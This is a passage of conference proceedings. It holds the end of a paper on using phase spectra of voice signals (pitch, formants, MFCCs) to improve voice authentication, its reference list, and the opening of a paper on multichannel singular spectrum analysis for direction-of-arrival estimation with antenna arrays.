Obviously, voice identification technologies came to user authentication systems from forensics. The scientific basis for the application of voice identification technology in forensic science has been investigated and discussed in detail in [13]. The general conclusion is that voice identification differs from fingerprints, where the variation is very small and there is no completely reliable method for determining whether speech signals are from the same person. In forensic science, speaker recognition can only be probabilistic, i.e. with an indication of the likelihood that the two speech signals belong to the same person. Under the conditions of an analog telephone channel, it is sometimes difficult even to recognize gender or age. Due to the small sample of speech signals, the confidence interval for assessing the likelihood that two recordings of speech belong to the same speaker is so large that an unambiguous decision is impossible. The problem of speaker segmentation is quite close. Segmentation of speakers in the flow of conversation of different speakers (audio-indexing, diarization) is necessary when marking up audio transcripts, teleconferences, radio and television broadcasts, interviews, etc. However, as in forensics, the quality of speaker selection is low and unacceptable for solving problems of user voice authentication [14]. The individuality of the acoustic characteristics of the voice is determined by three factors: the mechanics of vocal folds vibrations, the anatomy of the vocal tract, and the articulation control system. Acoustically, the style is realized in the form of a pitch frequency contour, the duration of words and their segments, the segments beat rhythm, the duration of pauses, and the volume level [2, 15]. The space of attributes, in which a decision is made about the speaker’s personality, should be formed taking into account all factors of the speech formation mechanism: a voice source, resonant frequencies of the vocal tract and their attenuation, as well as the dynamics of articulation control. In particular, in [15, 16], the following parameters of the vocal source are considered: the average pitch frequency, the pitch frequency contour, fluctuations in the pitch frequency and the shape of the excitation pulse. The spectral characteristics of the vocal tract are described by the spectrum envelope and its average slope, formant frequencies and their ranges, long-term spectrum or cepstrum [16]. In [17], it was shown that the most important factor in the individuality of a voice is the pitch frequency (F0) followed by the formant frequencies, the size of F0 fluctuations and the slope of the spectrum. In [18], there is an opinion that the attributes associated with F0 provide the best separability of voices followed by the signal energy and the duration of the segments. In some works, the formant frequencies are considered to be the most important factor [19, 20]. In particular, the fourth formant practically does not depend on the type of phoneme and characterizes the tract [20]. The works on speaker recognition mostly represent the method of cepstral transformation of the voice signals spectrum, which was first proposed in [21]. Cepstrum describes the shape of the signal spectrum envelope, which integrates the characteristics of excitation sources (vocal, turbulent, and impulse) and the shape of the vocal tract. In experiments on the subjective recognition of the speaker, it was found that the envelope of the spectrum strongly affects the voice recognition [22]. Therefore, the
684
M. Pastushenko and Y. Krasnozheniuk
use of a certain method for analyzing the envelope of the spectrum in order to recognize the speaker is justified. Instead of calculating the spectrum of a speech signal using a discrete Fourier transform over a short time interval, the amplitude-frequency characteristic of the signal found from the linear prediction coefficients of speech can also be used [23]. In [24], three informative regions were found: 100–300 Hz (influence of a voice source), 4–5 kHz (pear-shaped cavities) and 6.5–7.8 kHz (possible influence of consonants). A small area is around 1 kHz. Due to the fact that the overwhelming majority of speaker recognition systems use the same attribute space, for example, in the form of cepstral coefficients, their first and second differences, much attention is paid to the developing of decision rules, which were discussed above. The development and application of the GMM method is considered in works [25, 26]. The GMM method can be considered as an extension of the vector quantization method [26]. Vector quantization is the simplest model in speaker recognition systems regardless of context. Support Vector Machine (SVM) is actively used in various pattern recognition systems after the publication of the monograph [27]. This method allows to build a hyperplane in a multidimensional space that separates two classes, for example, the parameters of the target speaker and the parameters of speakers from the reference base. The hyperplane is calculated using not all vectors of parameters, but only specially selected ones. These are the reference vectors. Since the dividing surface in the original parameter space does not necessarily correspond to a hyperplane, a nonlinear transformation of the space of measured parameters into some attribute space of a higher dimension is performed. This nonlinear transformation must satisfy the linear separability requirement in the new feature space. If this condition is met, then the dividing surface in the hyperplane is constructed using the Support Vector method. Obviously, the success of using the Support Vector Machine depends on how well the nonlinear transformation is selected in each specific case when recognizing speakers. Support Vector Machine is used for speaker verification, often in combination with GMM or HMM. The Hidden Markov Models (HMM) method is also used for speaker recognition, which has proven itself in the tasks of automatic speech recognition [28, 29]. In particular, it is assumed that for short phrases lasting several seconds for the context-dependent approach, it is best to use phoneme-dependent HMMs, rather than models based on the probabilities of transition from frame to frame with a duration of 10–20 ms. The method of Hidden Markov Models can be used together with the GMM method. The general conclusion from the analysis of the known literature is that the templates for authentication (speaker recognition) are formed on the basis of digital processing of the amplitude-frequency spectrum of the user’s voice signal. At the same time, a more informative parameter of the user’s voice data is ignored, namely, the phasefrequency spectrum. This can be a promising direction for improving the reliability of voice authentication.
Results of Experimental Research on Phase Data of Processed Signals
685
4 Methodology and Research Results We will analyze the experimental voice signal of a user of the authentication system, who pronounced the word “one”. The sampling rate is 64 kHz and the signal-to-noise ratio is over 27 dB. The analyzed voice signal is shown in Fig. 1. First of all, let us pay attention and explain the used sampling frequency of the analyzed signal. In accordance with the Nyquist-Shannon theorem, the sampling frequency of the analyzed signal must exceed 2 · fmax . In this case, fmax = 8 kHz is the cutoff frequency of the area in which the attributes of the user’s voice signal are located. In our opinion, the sampling rate should be higher. Let us show it.
Fig. 1. Voice signal of the word “one”
To do this, compare the characteristics of digital processing of a signal with a sampling rate of 64 kHz with the results obtained by processing the same signal with a frequency of 32 and 16 kHz. To obtain potential characteristics, the analyzed signals (with a sampling rate of 32 and 16 kHz) will be obtained by decimating the original analyzed signal. This approach will eliminate the influence of time alignment and resampling procedures. The evaluation criterion is the normalized correlation coefficient, and as the investigated digital signal processing procedures we use: – Hilbert transform; – phase formation procedures;
686
M. Pastushenko and Y. Krasnozheniuk
– spectral analysis. In this case, the normalized correlation coefficient is recalculated using the known relation [5] in the signal-to-noise ratio. The results are summarized in Table 1. Table 1. Results of evaluating the influence of sampling rate Frequency, kHz/Procedures
Hilbert transform
Phase formation procedures
Spectral analysis
32
0.99 20 0.99 20
0.97 15 0.95 13
0.94 12 0.92 10
16
In this case, the numerator contains the value of the normalized correlation coefficient, and the denominator contains the corresponding value of the signal-to-noise ratio in dB. It follows from the results obtained that – the sampling rate depends on the complexity of the digital signal processing procedures; – the sampling rate should be significantly higher than the frequency, which is determined by the Nyquist theorem. Moreover, similar studies were carried out for phase-shift keyed signals [30] and it was found that the sampling frequency in the presence of interference should be approximately equal to 8 · fmax . Therefore, below we analyze a voice signal with a sampling rate of 64 kHz. Now let us consider the procedures for the formation of the phase data of the analyzed voice signal, which are not recorded using a microphone. Therefore, phase data, as a rule, are calculated programmatically - algorithmically or during processing registration materials using special microcircuits (digital signal processors). In this case, it is necessary to restore the quadrature (imaginary) component of the voice signal from the recording materials. These procedures are related to the application of the Hilbert transform [5] 1 y(t) = 2
∞ −∞
x(τ ) d τ, π(t − τ )
(1)
where x(t) is the registered voice signal; y(t) is quadrature (imaginary) component of the analytical signal; t is an independent variable that has the physical meaning of a unit of time; τ is the variable of integration. Next, we can use the known ratio and calculate the phase of the voice signal using the arctangent function ϕ(t) = arctg
y(t) . x(t)
(2)
Results of Experimental Research on Phase Data of Processed Signals
687
Unfortunately, this function produces angle values in the range from −π/2 to π/2 (see Fig. 2, dashed line).
Fig. 2. Phase signal fragment
To determine the correct value of the phase angle, which for the voice signal varies in the range from 0 to 2 · π , it is necessary to correct the obtained angle ϕ(t) accordingly, taking into account the signs of the numerator and denominator in the ratio of the function arctg. Otherwise, the phase spectrum will be incorrect. After the correction, we obtain the phase angle, which has the shape of a sawtooth signal of unknown duration (See Fig. 2, the solid line is the corrected phase angle). Unfortunately, not in all cases the phase angle is of a qualitative nature. For example, Fig. 3 shows a phase signal with errors that deviate the phase angle from the sawtooth signal. As shown by the results of previous studies [31], after the formation of phase data, it is necessary to perform preprocessing procedures for the registration materials, the quadrature component and phase data. This is due to several factors that can lead to erroneous phase data values. Among the influencing factors, we highlight the following: – the polyharmonic nature of the voice signal, which is processed by the Hilbert transform. The latter is focused on working with harmonic stationary data; – incorrect data when the components y (t) or x (t) in the function are equal to zero in the arctg function;
688
M. Pastushenko and Y. Krasnozheniuk
Fig. 3. Phase angle with erroneous values
– at small values of the components y (t) or x (t), the latter can be lost in rounding noise. These factors lead to the fact that in the sawtooth phase signals both random errors and abnormal measurements can occur. This necessitates preliminary processing of both the voice signal and phase data. Preprocessing can be based on a priori data on the nature of the change in the phase of the voice signal and will improve the quality of the characteristics formation of both existing and prospective component patterns. In addition, the nature of changes in the analytical signal modulus can also be used in the preprocessing procedures. Further, as in the well-known modern VASs, we will calculate the amplitudefrequency spectrum from the experimental voice signal and perform its analysis. In this case, as indicated above [24], we will focus on the low frequency region (up to 8 kHz), where the user characteristics of the authentication system are located, initially focusing on the pitch frequency and the associated format frequencies. It is known that the value of the pitch frequency is an individual characteristic of the speaker. It can vary depending on the emotional coloring of speech, but within fairly narrow limits. In parametric speech coding, it is assumed that the pitch frequency of a person lies in the range of 80–400 Hz, and most formant frequencies are multiples of F0.
Results of Experimental Research on Phase Data of Processed Signals
689
The amplitude-frequency spectrum of the analyzed signal is shown in Fig. 4.
Fig. 4. Short amplitude spectrum of a voice signal of the word “one”
Analysis of the amplitude-frequency spectrum of the user’s real voice signal made it possible to estimate the pitch frequency in the region of 243 Hz. In this case, three formant frequencies are pronounced (See Table 2), and the subsequent ones have a low level of intensity. Table 2. Characteristics of amplitude spectrum formants Level, dB
43.4
24.6
18.6
14.2
Frequency, Hz
243
486
776
1025
Now let us investigate the considered characteristics in relation to the phase information of the voice signal of the user of the authentication system. It should be noted that phase data is processed using the same procedures as amplitude data. Figure 5 shows the phase spectrum of the corrected phase data, which is considered below.
690
M. Pastushenko and Y. Krasnozheniuk
Fig. 5. Short phase spectrum of the voice signal
The results of processing the formant information of the phase spectrum are presented in Table 3. In this spectrum, six formants can be distinguished, and the seventh and eighth have an insignificant energy difference. The pitch frequency, as in the amplitude spectrum, is 243 Hz. The level of the spectral density of the selected maxima is several times higher than the level of the maxima of the amplitude spectrum, which greatly simplifies the procedure for their isolation. The number of isolated formants in the phase spectrum is one and a half times greater. The above indicates that the phase spectrum of the voice signal is more informative. Table 3. Characteristics of phase spectrum formants Level, dB
84.9
76.7
70.3
65
64
62
Frequency, Hz
243
492
738
990
1217
1450
Results of Experimental Research on Phase Data of Processed Signals
691
Since at present most scientific works in the field of voice authentication [12] are devoted to Mel-Frequency Cepstral Coefficient (MFCC), below we will focus on these coefficients. Note that MFCCs are usually included as attributes in all user templates. Both the calculation of the cepstral and mel-frequency cepstral coefficients are performed according to the scheme shown in Fig. 6. In this Figure, the following designations are adopted: FFT - block of signal Fast Fourier Transform; LOG - spectrum logarithm block; IFFT – block of Inverse Fast Fourier Transform.
Fig. 6. General scheme for signal cepstral analysis
Thus, the cepstral and mel-frequency cepstral coefficients are the result of applying the inverse Fourier transform to the logarithmic energy spectrum. The calculation of these coefficients is carried out on signal samples, which are several tens of milliseconds in duration. In this case, the samples are selected with some overlap. In this case, a number of additional operations are performed that are not indicated in the above scheme. Among these operations, we highlight: – data normalization in the sample and processing of the results by the Hamming window; – processing of the spectrum using a comb of triangular filters in the mel-scale region; – discrete cosine transform is used instead of IFFT. Below Fig. 7 shows the results of calculating 15 MFCC coefficients with an overlap of 0.75 in the process of analyzing the amplitude information of the voice signal. This signal included approximately 150 samples.
692
M. Pastushenko and Y. Krasnozheniuk
Fig. 7. Mel-frequency coefficients calculated from amplitude information
In this case, the sample included 1024 counts, and the triangular filters took into account the range of analyzed frequencies from 40 Hz to 8 kHz. A gap in the area of 75 samples can be used to divide a word into syllables. It should be noted that the calculated coefficients for the amplitude information are jagged. We will process the phase information using the same procedures and estimate the same number of MFCCs. The calculation results are shown in Fig. 8.
Results of Experimental Research on Phase Data of Processed Signals
693
Fig. 8. Mel-frequency coefficients calculated from phase information
Comparison of the graphs presented in Fig. 8 and 9 gives the right to conclude that the MFCC coefficients calculated from the phase information are more stable. We now quantify the calculated MFCCs obtained from the amplitude and phase information using the normalized correlation coefficient. The results are shown in Fig. 9. The analysis of the presented dependence shows a high correlation of the MFCC coefficients calculated from the amplitude and phase information. The presented results indicate a high information content of the phase data of the user’s voice signal.
694
M. Pastushenko and Y. Krasnozheniuk
Fig. 9. Dependence of the MFCC correlation coefficient on the sample number
5 Conclusions The article discusses the problem of improving the quality characteristics of voice authentication systems. As the main direction for solving this problem, it is proposed to use the phase data of the analyzed voice signal in the process of digital processing. The reliability of the proposed solution to this problem and the analysis of the informativeness of the phase data of the voice signal are investigated in the process of experimental evaluation of the pitch frequency and formant information, which are included in the majority of user templates as mandatory parameters. In addition, the cepstral or melfrequency cepstral coefficients and a number of other attributes are included in the template. The pitch frequency allows to solve the following tasks: recognition of emotions, gender determination, audio segmentation with multiple voices and splitting speech into phrases. In this regard, the work considered the relevant scientific problem of studying new information parameters of the voice signal to refine the estimates of the pitch frequency and other user characteristics. The estimates were refined based on the use of the phase data of the voice signal. A distinctive feature of using phase data is the following: – it allows to implement procedures for preliminary processing of registration materials, which can significantly improve the quality of the user characteristics evaluation;
Results of Experimental Research on Phase Data of Processed Signals
695
– to evaluate attributes from the phase data of a voice signal, we can use well-known procedures that are used to process amplitude information. The results were obtained in the process of statistical analysis of the simulation results using the experimental voice data of the authentication system user. The phase data of the voice signal allows one to obtain adequate and reliable estimates, both in the process of spectral analysis and in the estimation of mel-frequency spectral coefficients. It is advisable to conduct further research in the direction of evaluating the quality of the formation of other attributes that are traditionally used in user templates, taking into account the phase of the voice signal, as well as the development of new procedures for the formation of template elements based on phase data.
References 1. Ramishvili, G.S.: Avtomaticheskoe opoznavanie govoriashego po golosu (Automatic Speaker Recognition over Voice), p. 222. Radio i sviaz, Moscow (1981) 2. Beigi, H.: Fundamentals of Speaker Recognition. Springer, New York (2011). https://doi.org/ 10.1007/978-0-387-77592-0 3. ISO/IEC 2382-37:2012 Information technology. Vocabulary, Part 37: Biometrics 4. Bolle, R., Connell, J.H., Pankanti, S., Ratha, N.K., Senior, A.W.: Guide to Biometrics. Springer, New York (2004). https://doi.org/10.1007/978-1-4757-4036-3 5. Ifeachor, E.C., Jervis, B.W.: Digital Signal Processing. A Practical Approach, 2nd edn. Pearson Education Limited, New York (1993, 2002) 6. Oppenheim, A.V., Lim, J.S.: The importance of phase in signals. Proc. IEEE 69(5), 529–541 (1981). https://doi.org/10.1109/PROC.1981.12022 7. Paliwal, K.: Usefulness of phase in speech processing. In: Proceedings of the IPSJ Spoken Language Processing Workshop, Gifu, Japan, pp. 1–6 (2003). http://citeseerx.ist.psu.edu/vie wdoc/download?doi=10.1.1.212.5125&rep=rep1&type=pdf 8. Paliwal, K., Atal, B.: Frequency-related representation of speech. In: Proceedings of the European Conference on Speech Communication and Technology (EUROSPEECH-2003), pp. 65–68 (2003). https://maxwell.ict.griffith.edu.au/spl/publications/papers/euro03_atal.pdf 9. Borisenko, S.Yu., Vorobiev, V.I., Davidov, A.G.: Sravnenie nekotorykh sposobov analiza fazovikh sootnoshenii mejdu kvazigarmonicheskimi sostavliaushimi rechevykh signalov (Comparison of some methods for analyzing the phase relationships between the quasiharmonic components of speech signals). In: Proceedings of the First All-Russian Acoustic Conference, pp. 2–7 (2004) 10. Wu, Z., Kinnunen, T., Chng, E., Li, H., Ambikairajah, E.: A study on spoofing attack in stateof-the-art speaker verification: the telephone speech case. In: Proceedings of the Asia-Pacific Signal Information Processing Association Annual Summit and Conference (APSIPA ASC) (2012) 11. Sorokin, V.N., Viugin, V.V., Tananikin, A.A.: Raspoznavanie lichnosti po golosu: analiticheskii obzor (Speaker recognition over voice: analitical overview). Inform. Protsessi 12(1), 1–30 (2012) 12. Tirumalaa, S.S., Shahamiri, S.R., Garhwal, A.S., Wang, R.: Speaker identification features extraction methods: a systematic review. Expert Syst. Appl. 90, 250–271 (2017) 13. Broeders, T.: Forensic speech and audio analysis forensic linguistics. In: Proceedings 13th INTERPOL Forensic Science Symposium, Lyon, France, 16–19 October 2001, vol. D2, pp. 54–84 (2001). https://ssrn.com/abstract=2870568
696
M. Pastushenko and Y. Krasnozheniuk
14. Fergani, B., Davy, M., Houacine, A.: Speaker diarization using one-class support vector machines. Speech Commun. 50, 355–365 (2008). https://doi.org/10.1016/j.specom.2007. 11.006 15. Kuwabara, H., Sagisaka, Y.: Acoustic characteristics of speaker individuality: control and Conversion. Speech Commun. 16, 165–173 (1995). https://doi.org/10.1016/0167-639 3(94)00053-D 16. Sorokin, V.N., Tsyplikhin, A.I.: Speaker verification using the spectral and time parameters of voice signal. J. Commun. Technol. Electron. 55(12), 1561–1574 (2010). https://doi.org/ 10.1134/S1064226910120302 17. Matsumoto, H., Hiki, S., Sone, T., Nimura, T.: Multidimensional representation of personal quality of vowels and its acoustical correlates. IEEE Trans. AU AU-21, 428–436 (1973). https://doi.org/10.1109/TAU.1973.1162507 18. Shriberg, E., Ferrer, L., Kajarekar, S., Venkataraman, A., Stolcke, A.: Modeling prosodic feature sequences for speaker recognition. Speech Commun. 46(3–4), 455–472 (2005). https:// doi.org/10.1016/j.specom.2005.02.018 19. Lavner, Y., Gath, I., Rosenhouse, J.: The effects of acoustic modifications on the identification of familiar voices speaking isolated vowels. Speech Commun. 30, 9–26 (2000). https://doi. org/10.1016/S0167-6393(99)00028-X 20. Takemoto, H., Adachi, S., Kitamura, T., Mokhtari, P., Honda, K.: Acoustic roles of the laryngeal cavity in vocal tract resonance. J. Acoust. Soc. Am. 120, 2228–2239 (2006). https://doi. org/10.1121/1.2261270 21. Davis, S., Mermelstein, P.: Comparison of parametric representations for monosyllabic word recognition in continuously spoken sentences. IEEE Trans. Acoust. Speech Signal Process. 28(4), 357–366 (1980). https://doi.org/10.1109/TASSP.1980.1163420 22. Itoh, K.: Perceptual analysis of speaker identity. In: Saito, S. (ed.) Speech Science and Technology, pp. 133–145. IOS Press (1992) 23. Huang, X., Acero, A., Hon, H.-W.: Spoken Language Processing: A Guide to Theory, Algorithm, and System Development. Prentice-Hall, New Jersey (2001) 24. Lu, X., Dang, J.: An investigation of dependencies between frequency components and speaker characteristics for text-independent speaker identification. Speech Commun. 50(4), 312–322 (2007) 25. Reynolds, D.: Speaker identification and verification using Gaussian mixture speaker models. Speech Commun. 17, 91–108 (1995) 26. Reynolds, D., Quatieri, T., Dunn, R.: Speaker verification using adapted gaussian mixture models. Digit. Signal Process. 10(1), 19–41 (2000) 27. Vapnik, V.N.: Statistical Learning Theory. Wiley, New York (1998) 28. BenZeghiba, M., Bourlard, H.: On the combination of speech and speaker recognition. In: Proceedings of the Eighth European Conference on Speech Communication and Technology (Eurospeech), pp. 1361–1364 (2003) 29. Bimbot, F., et al.: An overview of the CAVE project research activities in speaker verification. Speech Commun. 31, 155–180 (2000) 30. Belousova, Ye.E., Pastushenko, N.C., Pastushenko, O.N.: Anaiz chastoti diskratizatsii na kachestvo formirovaniia kvadraturnoi sostavliaiushchei analiticheskogo signala (Analysis of the sampling rate for quality of quadrature component formation of analytical signal). Vostochno-Evropeiskii J. Peredovikh tekhnol. 1/9(61), 8–13 (2013) 31. Pastushenko, M., Pastushenko, V., Pastushenko, O.: Specifics of receiving and processing phase information in voice authentication systems. In: 2019 International Scientific-Practical Conference Problems of Infocommunications. Science and Technology (PIC S&T), Kyiv, Ukraine, pp. 621–624 (2019)
Sensor Array Signal Processing Using SSA Volodymyr Vasylyshyn(B) Kharkiv National Air Force University, Kharkiv, Ukraine [email protected]
Abstract. In the paper the adaptive singular spectrum analysis (SSA) method is extended to multiple channel case (to signal processing in antenna array). In the considered case, the trajectory matrix traditionally formed in SSA-like approaches has block-Hankel form. The embedding process that consists in selection of the part of data vector to form the data matrix) is explained with using so-called selection matrices, which are used in the spatial smoothing methods, ESPRIT (estimation of signal parameters via rotational invariance technique) like method. The relationship between vector smoothing operator used in antenna array signal processing and embedding process is also shown. Truncated singular value decomposition is used in the proposed technique. The situations when the sources have the different directions-of-arrival (DOAs) and different or the same frequencies are considered in the paper. Preprocessing performed by SSA-like methods improves the performance of DOA estimation. It can be extended to joint DOA and frequency estimation when using linear antenna array and to 2-D DOA estimation with the rectangular (circular) antenna array, noise reduction in speech with using microphone array. Improved DOA estimates can be used for subsequent signal reconstruction. Comparison of proposed technique and other noise reduction method (such as total least squares) is performed. Improved noise variance estimate is used within the framework of considered approach. Simulation results demonstrate the improved performance of subspace-based technique used with proposed approach. Keywords: spatial spectral analysis · adaptive Singular Spectrum Analysis · antenna array signal processing · superresolution methods
1 Introduction The characteristics and efficiency of the modern radar and communication systems depend on the many factors including the modulation type of the signals, the application of the spatial (time, frequency, polarization) diversity and so on [1–7]. However, probably the most significant factor is the application of the antenna array and antenna array signal processing respectively. In contrast to traditional systems, where the time signal processing is performed, in the systems with antenna array the space-time signal processing can be performed. Nowadays, the methods of space-time signal processing such as precoding, beamforming, space-time block-coding related with modern technologies such as MIMO (multiple input-multiple output) are widely used in the practice. MIMO © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 697–714, 2023. https://doi.org/10.1007/978-3-031-35467-0_41
698
V. Vasylyshyn
techniques have been widely used in IEEE standards 802.11n, 802.16e, 802.16m, 802.20, 802.22. Furthermore, MIMO is realized in the satellite communication systems Starlink. In the speech processing the use of array of microphones is a basis for realization of the modern noise reduction methods [8]. The vector antenna elements (composed for example from collocated dipoles and loops) give the opportunity to estimate the directions of arrival (DOA) of signals and their polarization. Nowadays antenna arrays are widely used in the ground based and airborne (satelliteborne) radar systems, modern communication systems (LTE (long-term evolution, 6G). In the communication systems, the realization of massive MIMO is related with using digital antenna array. The satellite communication system Thuraya, Starlink are the examples of systems with digital beamforming (DBF) and digital antenna array [9, 10]. Adaptive antenna array and smart array are widely used in radar and communication systems. For example, in the case of communication system with OFDM (orthogonal frequency division multiplexing) the adaptive antenna improves the performance of system. In such system the multiplication of signal on the weighting vector is possible before and after realization of the fast Fourier transformation. Smart antennas and beamforming techniques are of interest in mobile ad hoc networks [2–5]. MIMO eigenmode transmission system is optimal in the sense of maximization of the MIMO capacity. Eigenbeamformers are used in the receiver and transmitter of such MIMO system respectively [6]. Antennas with orthogonal polarizations form two parallel channels over the same link. In other to reduce the cross-polarization interferences in such systems, the CrossPolarization Interference Cancellation (XPIC) technology is used. Frequency diverse array (FDA) concept was recently proposed for wireless communication and radar [11]. The generation of the range-angle-dependent transmit beam pattern in FDA antenna is related with small frequency increment across array elements as opposed to the phased-array antenna. Antenna arrays are used usually on the physical layer of open systems interconnection (OSI). Directional antennas in mobile ad hoc networks offer significant potential throughput gains as compared to omnidirectional antennas. The directional mediumaccess-control (MAC) protocols can be realized with directional nal antennas. Superresolution methods can be used in such application. MAC protocol for wireless ad hoc networks with adaptive antenna array in multipath environments is known [4]. Here the antenna array is used for beamforming on the transmitter and receiver sides with the purpose of increasing spatial reuse. This aim is attained by directing nulls at active transmitters and receivers in the operation area. The effectiveness of antenna array signal processing can be improved by many ways and the main of them are presented on the Fig. 1. The possible ways of aperture extension include the following variants [5, 6, 12]: • • • •
minimum redundancy array; co-prime array; subarray-based array configuration; aperture extrapolation.
However, in the most cases related with aperture extension the problem of ambiguity resolution has a place.
Sensor Array Signal Processing Using SSA
699
Fig. 1. The main directions of improving performance of signal processing in antenna array
In the various signal processing applications it is important to appropriately modify a given data set so that the obtained data set possesses some prescribed properties. The properties are selected in such way that allows to identify useful signals contained in the data set. Data set modification serves as a cleaning process whereby noise is reduced. Nowadays the approaches of data set modification or noise reduction methods include the data adaptive signal estimation approach [13], Cadzow’s signal enhancement technique [14] and the modifications of the technique, original singular spectrum analysis (SSA) and modifications of the approach [15–19], wavelet thresholding, empirical mode decomposition, surrogate data technology [20] and another approaches from nonlinear dynamics. Compressive sensing or compressive sampling (CS) is a novel sensing/sampling paradigm [7] that reconstruct a signal using fewer samples than required by the Nyquist– Shannon sampling theorem.
700
V. Vasylyshyn
Selection of the basis [6] is a important moment in antenna array signal processing. In the context of the spectral analysis, signal forming in OFDM systems, reducedrank space-time adaptive processing, beamforming (precoding) the eigenbasis is very useful. It is related with Karhunen-Loeve transformation and can be formed based on the eigendecomposition (EVD) of CM of the data or singular value decomposition (SVD) of the data matrix. However, as alternative the power basis, which uses the powers of CM, basis obtained with using the discrete Fourier transform (DFT), basis based on discrete prolate spheroidal sequence (DPSS), Walsh or Haar function basis can be used. The Gram-Shmidt transformation can be very useful in the process of basis forming. The beamforming or precoding is very useful in the modern communication system with MIMO and OFDM and will be useful in technologies. In the case of the beamforming and precoding the SVD of the channel matrix is used. Resampling of data is very useful in the situations with small number of data snapshots. The most known approaches of resampling include jackknifing, bootstrap, the pseudonoise resampling, surrogate data approach [7, 20]. Higher-order cumulants saves the performance of the system in the case of nonGaussian signals corrupted by additive Gaussian noise [21]. The main motivation relies on the fact that the higher-order cumulants of Gaussian processes are identically zero. In other words, in the cases with nonGaussian signals with additive Gaussian noise, the a priori estimate of the noise covariance matrix is unnecessary. The information about the structure of CM is very important and useful in many applications [6, 14, 19]. Application of the knowledge of CM structure and methods (or algorithms) exploiting such structure results in more effective estimators for important cases with small signal-to-noise ratios and small samples. Besides of Toeplitz structure CM the persymmetric CM is used. Reduced dimension beamspace transformation is realized with using DFT, DPSS and so on [6]. In order to obtain reduced dimension when performing beamspace transformation the preliminary information is needed. For beamspace transformation in the situation with DOA the information about the coarse sector of source DOA estimates is required. The main advantage of beamspace processing is reduction of the computational complexity of DOA estimation. Application of beamspace concept to MIMO (including channel estimation, beamspace precoding, millimeter-wave (mm-wave) technologies) is discussed in technical literature [5–7]. In the many applications of signal processing it is necessary to manipulate with quantities the elements of which are addressed by more than two indices. These higherorder equivalents of vectors and matrices are named as higher-order tensors [22–24]. Tensor representation gives the possibility to more efficiently exploit the structure inherent in the data. Parallel factor decomposition is a decomposition of higher-order tensors in rank-1 terms. A multilinear generalization of the SVD and multilinear SVD for structured tensors (Hankel tensors, for example) are known. The tensor algebra is also applied to spatial smoothing, channel sounding, source separation. Higher-order SVD and application the data structure leads to improvement of signal processing efficiency (i.e. parameter estimation and so on). Expected-likelihood covariance matrix (CM) estimates [25] as compared to traditional maximum-likelihood (ML) estimates enhance adaptive detection, DOA estimation
Sensor Array Signal Processing Using SSA
701
performance. CM with the “closest possible” likelihood ratio to the one generated by the exact (true) CM is used for estimation and detection. Constant modulus algorithms [6] exploit the constant modulus property of the desired communication signals (e.g. FM (frequency modulated) and PM (phase modulated) in the analog domain, and FSK (frequency shift keying), PSK (phase shift keying), 4-QAM (quadrature amplitude manipulation) for digital signals) and other signals. They are used for blind beamforming, equalization and multiuser detection. Furthermore, the cyclostationarity of communication signals are frequently used to improve the performance of communication systems. Nowadays application of such properties of communication signals together with using of OFDM technology is assumed for Starlink. Polarization-time signal processing is important reserve in the signal processing. It used in MIMO, for parameter estimation such as time delay estimation (for multipath mitigation), DOA and polarization parameters estimation using polarization sensitive array. Coherent processing (when the information about phase of signal (pulse) is used) improves the SNR in the many cases in the radar (in the moving-target indication mode) and communication systems [1, 6]. Combined estimation for improving the performance of DOA estimation was initially proposed by A. Gershman [6]. It is used also in pattern recognition. Combined estimation can be realized using set of estimation methods with different characteristics or one method for data obtained by resampling. Outlier identification and cure additionally improves the performance of combined estimation [7]. The spatial time-frequency distribution (STFD) approach assume application matrix of auto- and cross- bilinear distributions of the data observations instead of the traditional CM [26]. For wideband array processing, the traditional way is presentation of the array outputs as narrowband signals by passing it through a bank of narrowband filters. DOA information embedded in each band is combined using coherent or incoherent signal subspace methods [1, 6]. Clustering approaches of pattern recognition (hierarchical (agglomerative and divisive) clustering, K-means and correlation clustering) are widely used to optimize the objective functions, segment the image, and estimate the parameters [7]. Lattice filters are used for space-time adaptive processing, spectral analysis, and channel equalization. Lattice structures are used for factorization of CM (for example, Cholesky factorization), prediction of processes [27]. Splines (B-splines) are used for smoothing, interpolation, low-pass filtering in image and signal processing [28]. SSA is used in many applications related with problems of signal processing in communication systems (in the case of speech processing, channel estimation), radar, seismic data applications [29–31]. Extension of SSA to multiple channels (the so called multichannel SSA (MSSA) is considered in [15]. In general the usual steps of traditional SSA related with formation of trajectory matrix by embedding of the input data, spectral presentation of trajectory matrix using SVD, truncation of SVD and reconstruction of clean matrix of data (or signal matrix), hankelisation have a place in MSSA. The main peculiarity is related with the size of the
702
V. Vasylyshyn
formed CM which for the multichannel case is KM × KM , where M is the number of array antenna elements and K = N − l + 1 is the number of columns of trajectory matrix for one antenna element, N is the length of the signal sequence, l is the embedding window. For example, for M = 10, N = 100, l = 50 the size of corresponding matrix is 510 × 510 and the problem of realization of MSSA in the close to real time mode is significant. The last fact is related with necessity of calculation of EVD or SVD of the matrix. Therefore is of interest to find the generalization of SSA to multichannel case with reduced computational load as compared to mentioned before. It should be noted that application of Hankel block matrix to estimating twodimensional frequencies by matrix pencil method was considered in [32]. Here the partition-and-stacking process is used to enhance the rank condition of the data matrix. From the mathematical point of view this idea is similar to the idea of moving window (spatial smoothing) used in antenna array signal processing [1, 6, 33–36]. In the paper the generalization and extension of the paper [37] is proposed. The application of adaptive SSA for DOA estimation is considered. Uniform linear array (ULA) is used in the paper. The cases with different and the same frequencies of signals are considered in the paper. Spatial smoothing procedure together with SSA was used in the case of signals with the same frequencies. The simulation results confirm the improvement of the DOA estimation performance by ESPRIT method when using SSA.
2 Signal Model and Adaptive Multichannel SSA Method Unlike to the previous papers [18, 19] the model of input signal includes the components that describe the influence of antenna array. We can express the v-th signal in the following fashion [6, 37] sv (n) = ςv exp(j(ωv n + ϕv )),
(1)
√ where ςv is the amplitude of the v-th component, v = 1, · · · , V , j = −1, ωv = 2π fvn , ωv ∈ [0, π ), fvn = 2π fv /fs is the normalised frequency, fs is the sampling frequency and ϕv is the phase of v-th component. Such signal model is widely used in many applications of radar and communication systems. In some practical situations, the particular components can be added. In the case of received OFDM signal of low Earth orbit (LEO) satellite such as Starlink the Doppler shift should be included in the model [9]. We assume that the source signals are impinging on ULA from directions θ = [θ1 , · · · , θV ]T , ()T denotes transposing operator. The ULA consists of M sensors with an inter-element spacing = λ/2, λ is the wave length. M × 1 output signal of the antenna array can be described as x(n) = As(n) + e(n), n = 1, . . . N .
(2)
